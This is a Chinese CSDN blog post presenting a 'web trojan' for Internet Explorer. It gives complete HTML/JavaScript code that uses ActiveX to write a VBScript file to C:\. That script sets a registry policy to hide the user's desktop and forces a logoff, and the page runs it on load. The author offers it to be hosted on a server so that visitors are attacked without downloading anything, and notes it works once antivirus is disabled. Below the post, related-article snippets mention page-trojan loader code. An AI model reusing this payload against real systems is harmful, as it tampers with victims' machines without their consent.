IE网页木马 - 使用 JS 实现打开网页后直接运行木马程序

最新推荐文章于 2024-06-18 11:30:49 发布
最新推荐文章于 2024-06-18 11:30:49 发布
阅读量933 收藏 8
点赞数 1
分类专栏: JavaScript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Simon798/article/details/93851654
版权

首先,这个木马的功能基于 IE 浏览器的 ActiveX 的功能,也就是说只适用于 IE 浏览器,如果你的浏览器没有打开 ActiveX 控件,百度搜吧。
在这里插入图片描述!!!

然后你需要有一台自己的服务器,因为我们的目的是打开一个链接,在不需要用户下载任何文件的情况下实现木马效果:
在这里插入图片描述
web.html 的代码如下:

<html>

<script language="JavaScript">

var fso,f1;
fso= new ActiveXObject("Scripting.FileSystemObject");
f1=fso.CreateTextFile("C:\\LYSM.vbs",true);
f1.WriteLine("Set r=CreateObject(\"Wscript.Shell\")");
f1.WriteLine("r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop\",1,\"REG_DWORD\"");
f1.WriteLine("r.Run \"shutdown -l\"");
f1.Close();

var wsh = new ActiveXObject('WScript.Shell');
wsh.Run('C:\LYSM.vbs');

//alert("finish");

</script>

</html>

主要功能就是在 C 盘根目录创建一个 .vbs 文件,并往里写入文本,这些文本可以实现锁定桌面和注销计算机的效果。ActiveX 支持运行本地应用程序。(我这里开了360,关闭360后的效果还是很棒棒的 ┗( ▔, ▔ )┛)
在这里插入图片描述

(-: LYSM :-)
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站被篡改植入木马脚本,显示浏览器要升级等信息的原因说明和详细解决办法!
任聪聪的博客
06-21 1397
本篇文章主要讲解常见手机打开网页出现红包弹出框,或是浏览器弹出要更新的常见dns劫持问题的解决方法。 适用范围:web端所有的网站 日期:2021年6月21日 问题的截图展示: 就是上面这种,一般是黑客通过dns劫持或者网页篡改植入的无危害的js脚本病毒或者是有危害的js脚本病毒,常通过提示让用户误点下载流氓软件或者其他类型软件实现盈利。 一般造成的原因是:dns劫持、网页被篡改 一、提示浏览器版本过低的套路和解决方法 形式说明:提示浏览器版本过低,实际上是一个流氓软件,或者是其他的正常apk。 第一.
网页打开后自动执行木马
cqhand的专栏
02-02 1047
lcx run_exe="run_exe+="CODEBASE=/"muma.exe#version=1,1,1,1/">" //这里的muma.exe就是我们要运行的程序 run_exe+="" run_exe+="" run_exe+="等会......网页在下载支持的文件"; //这里是迷惑人的.你可以写其他任何东西. document.open(); document.clear(); d
JS木马的原理及防范方法
何足道也
09-21 3539
木马一直是黑客的拿手技量。善于用木马的黑客,可以在原来的入侵基础之上达到更大的目的。如今,虽然木马的种类有很多。但其中IFRAME挂马比较早,相应的预防措施也比较多,其中用CSS配合JS脚本进行预防是主流方式。可这种预防方式也存在安全隐患,JS脚本也可以被用来挂马,令人防不胜防。我们下面要介绍反击JS挂马的方法。 JS挂马溯源 当IFRAME逐渐被黑客滥用的时候,有经验的安全工程师也开始研究相
遭了!JavaScript 代码被投毒了
最新发布
IT界那些事儿
06-18 132
不知大家是否还记得两年前 Github 出现的一个名为 Evil.js 的项目,其号称专治 996 公司,实际就是给前端项目“。原型污染是一种很少被关注但潜在风险严重的安全漏洞,它影响基于原型的编程语言,例如 JavaScript。这种漏洞。
dedecms:dedeajax2.js被植入js木马
zxy840552216的博客
08-30 217
这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下: //初始化xmldom function InitXDom(){ if(DedeXDOM!=null) return; var obj = null; if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox var parser = new DOMParser(); obj
javaScript代码,在浏览器中是如何被执行的?
qq_42424368的博客
02-28 1448
当你在浏览器输入一个网址时,比如www.baidu.com,首先会dns解析,得到真实的ip地址,然后会向服务器发送请求,得到一个index.html ,解析这个文件,遇到link标签会下载css文件,遇到script标签会下载js文件。接下来就是渲染这些文件了。 认识浏览器内核 不同的浏览器有不同的内核组成 Gecko:早期被Netscape和Mozilla Firefox浏览器浏览器使用; Trident: 微软开发,被IE4~IE11浏览器使用,但是Edge浏览器已经转向Blink; Web..
兼容IE8的jQuery旋转木马幻灯片插件.zip
07-11
Carousel.js 是一个专为jQuery设计的旋转木马幻灯片插件,特别强调对IE8浏览器的兼容性,使得在旧版本的Internet Explorer上也能实现流畅的动态展示效果。这个插件非常适合用来创建吸引人的多媒体展示,比如电影海报...
网页超链接调用本地exe程序.doc
07-22
早期的解决方案是使用 JS 调用,但是这绝对不安全,因为这种方式无法阻止木马病毒程序,会给用户带来灾难性的后果。IE6 之后,微软就不再允许这种调用方式。 本文档将介绍一种不需要 Com 组件支持的方法来调用本地 ...
vb.net桌面程序引用网页相互通信
08-02
三、 网页title变化,触发DocumentTitleChanged事件; 2 四、 具体调用方式: 2 1. vb.net给html的文本框赋值 2 2. vb.net调用html页面js的方法,并传值给js: 2 3. vb.net获取html页面一个元素的值: 2 4. js 调用...
剖析各类恶意网页对策分析—注册表使用全攻略之七
09-16
3. **利用IE文本漏洞**:某些恶意网页利用Internet Explorer的漏洞,通过JavaScript脚本等方式直接修改注册表。 - **防御策略**: - 定期更新操作系统和浏览器至最新版本,以获取最新的安全补丁。 - 使用第三方...
IE保护程序.rar
04-05
在IE保护程序中,开发者可能使用了易语言提供的系统调用来与操作系统交互,实现如阻止恶意脚本执行、过滤有害链接、保护隐私数据等功能。源码分析可能涉及以下几个知识点: 1. **安全编程原则**:包括输入验证、...
网页多种挂马代码,JS
09-13
本文件内涵多种挂马代码。含有HTM JS调用等等,涉及到网页函数。
一个可恶的javascript病毒/木马解码之后的代码
小橙的第一播
11-02 9036
中毒的话,整个网络都会受影响,表现为所有的IE浏览器打开网页都会在前面加一个 javascript 的连接。清除比较麻烦。显示的这段是这个链接后面的代码:var vDA1 = new window["Date"]() vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)var eOTo$2 = new window["String"](wi
分享11个网页游戏和9个黑客源码,总有一款适合你(停止下载)
热门推荐
zy0412326的专栏
12-27 1万+
黑客和网页游戏源码 分享11个网页游戏和9个黑客源码,总有一款适合你源码下载地址:20个你喜欢的.rar - 蓝奏云 下面是文件的名字,我放了一些图片,文章里不是所有的图主要是放不下...,大家下载后可以看到。 PHP网页游戏xnova(ogame)-银河帝国v0.8版源码 JavaScript 连连看游戏代码[测试通过] JavaScript网页版泡泡龙游戏代码 基于JavaScript的植物大战僵尸版 v11.06.13 PHP+Flash网页游戏版斗地主 onWeb v2009 俄罗斯方块java
视频直播app源码,纯JS实现旋转木马/3d相册
云豹网络科技
05-18 235
4.遍历数组,使其沿y轴旋转Deg度。此处使用了原型,使用foreach方法遍历了数组,让其内每个图片都执行了function(el,index)。使用index下标区分开了数组内每个图片需要旋转的不同度数(第一张0°(Deg * 0) 第二张Deg度 (Deg * 1) 第三张(Deg * 2)度…以数组的形式获取,并根据其数组长度length来计算图片的旋转角度。以上就是 视频直播app源码,纯JS实现旋转木马/3d相册,更多内容欢迎关注之后的文章。视频直播app源码,纯JS实现旋转木马/3d相册。
二行代码解决全部网页木马(含iframe/script木马
weixin_33938733的博客
11-14 172
先说明一下,不要一挂马就说dede有漏洞,请先阅读关于服务器被批量挂马的解决方案 这里告诉大家用CSS代码屏蔽iframe/script木马 注意,以下地址含有木马,请不要轻易访问: 解决方案1: Copy code iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/...
网站被挂木马了,假的,js从那儿出来的
jjzaihaozhe的专栏
06-02 4969
今天使用搜狗高速浏览器无意查看我们网站的源码,不看不知道,一看吓一跳,前部和尾部均多出来很多js,可能是挂木马了,这是我的第一个意识。
各种网页木马挂马的代码
jahn的专栏
09-30 2870
1、嵌入网页 以下是引用片段:  2、PHP网页挂马 以下是引用片段:   3、图片木马 以下是引用片段:   4、邮件木马 以下是引用片段:    5、flash木马 http://网页木马地址 插入木马地址 width=10 height=10", "GET" 宽度和高度,方式 后面的照添,更改木马地址就可以了。 6、做123.JS文件木马 以下是引用片段
网页木马机理与防御技术解析
这种攻击方式被称为"Drive-by-Download",即用户只需浏览被挂马的网页,无需任何交互,恶意程序就能自动下载并运行。挂马网页通常设计巧妙,可能包含多层嵌套链接,使得恶意程序在用户无意识的情况下传播。 网页...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值